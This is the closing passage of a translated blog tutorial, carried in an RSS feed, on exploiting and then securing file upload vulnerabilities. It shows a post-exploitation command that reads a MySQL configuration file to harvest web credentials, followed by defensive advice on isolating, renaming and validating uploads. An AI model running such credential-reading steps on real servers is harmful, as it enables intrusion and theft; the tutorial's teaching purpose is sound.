<p><img decoding="async" loading="lazy" class="size-full wp-image-27235 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/05/220.png" alt="How to exploit File Upload 18 . vulnerability" width="895" height="452" srcset="https://anonyviet.com/wp-content/uploads/2021/05/220.png 895w, https://anonyviet.com/wp-content/uploads/2021/05/220-300x152.png 300w, https://anonyviet.com/wp-content/uploads/2021/05/220-768x388.png 768w, https://anonyviet.com/wp-content/uploads/2021/05/220-750x379.png 750w" sizes="auto, (max-width: 895px) 100vw, 895px" title="How to exploit File Upload vulnerability 23"/></p>
<p>I already have the database configuration file path, what should I do next?  Using the command of course <code>cat /etc/mysql/my.cnf</code> to read the file content and find the web password account and nothing more.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-27236 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/05/221.png" alt="How to exploit File Upload 19 . vulnerability" width="897" height="438" srcset="https://anonyviet.com/wp-content/uploads/2021/05/221.png 897w, https://anonyviet.com/wp-content/uploads/2021/05/221-300x146.png 300w, https://anonyviet.com/wp-content/uploads/2021/05/221-768x375.png 768w, https://anonyviet.com/wp-content/uploads/2021/05/221-750x366.png 750w" sizes="auto, (max-width: 897px) 100vw, 897px" title="How to exploit File Upload 24 . vulnerability"/></p>
<p>Very dangerous, right?  Now that we have seen how the File Upload attack can make your website vulnerable, now we will learn how to secure the File Upload feature.</p>
<h2 id="ftoc-cach-bao-mat-file-upload" class="ftwp-heading">How to secure File Upload</h2>
<p>File Upload is a fairly easy way for an attacker to inject malicious code into your website.  You need to make sure your uploaded files are quarantined until they are fully secured, otherwise you could create an easy path for your system to be attacked.</p>
<h3 id="ftoc-rui-ro" class="ftwp-heading">Risk</h3>
<p>Clever hackers often exploit a combination of vulnerabilities when attacking your website – uploading malicious code to the server is the first step in the attack process.  The next step is to find a way to execute the malicious code.</p>
<p>Even large companies suffer from this vulnerability, especially if they are running complex, legacy codebases.</p>
<h3 id="ftoc-bao-ve" class="ftwp-heading">Protect</h3>
<p>Any input coming from the user must be handled with care until it is guaranteed to be safe.  This is especially true for uploaded files, because initially your application often treats them as a block of innocuous data, allowing attackers to inject any kind of malicious code they want into the system. your.</p>
<h4 id="ftoc-tach-noi-dung-tai-len" class="ftwp-heading">Split uploads</h4>
<p>Uploaded files are usually less processed.  Unless you&#8217;re building a website that handles images, videos, or documents.  If that&#8217;s the case, making sure uploaded files are kept separate from the system code is of the utmost importance.</p>
<p>You can use cloud storage services or a content management system to store uploaded files.  Also, if you want, you can write uploaded files to your database.  Both of these approaches prevent random script execution.</p>
<p>Even storing uploaded files on a file server or in a separate disk partition helps, isolating the potential damage a malicious file could cause.</p>
<h4 id="ftoc-dam-bao-khong-the-thuc-thi-tep-tai-len" class="ftwp-heading">Make sure the file upload cannot be executed</h4>
<p>However, if the file uploads are written to disk, make sure they are not treated as executables by the operating system.  Your web server must have read and write permissions on the directories used to store the uploaded content, but cannot execute any files there.  If you are using a Unix-based operating system, make sure that the uploaded files do not have “executable” permissions.</p>
<h4 id="ftoc-doi-ten-tep-tai-len" class="ftwp-heading">Rename the uploaded file</h4>
<p>Rewriting or obfuscating filenames would make it difficult for attackers to identify malicious files once they&#8217;ve been uploaded.  At this point, the hacker will not be able to determine the file name to execute the uploaded file.</p>
<h4 id="ftoc-xac-thuc-dinh-dang-tep-va-tien-ich-mo-rong" class="ftwp-heading">Validate file formats and extensions</h4>
<p>Make sure you check that the file extension of the uploaded file is in the list of allowed file types.  Do this on the server side, as client side checks can be disabled.</p>
<h4 id="ftoc-xac-thuc-content-type" class="ftwp-heading">Content-Type Authentication</h4>
<p>Files uploaded from the browser will be accompanied by a Content-Type header.  Make sure it&#8217;s on the whitelist of allowed file types.  (Be aware, however, that simple scripts or proxies can spoof the file type, so this protection, while useful, is not enough to deter an attacker.)</p>
<h4 id="ftoc-su-dung-trinh-quet-vi-rut" class="ftwp-heading">Use a virus scanner</h4>
<p>Virus scanners are very helpful in detecting malicious files masquerading as a different file type, so if you are using the File Upload feature, you should run a virus scan.</p>
<p>There are also other File Upload security measures such as checking file size, zip bomb, etc.</p>
<p>If you want me to work on any holes next, please comment below.  Don&#8217;t forget to join Anonyviet&#8217;s Discord Server <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fdiscord.gg%2FkfXcGpJVz6" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here.</a></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;27225&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;101&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (101 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (101 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-exploit-file-upload-vulnerability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/05/khai-thac-lo-hong-upload-file.png" medium="image"></media:content>
            	</item>
	</channel>
</rss>
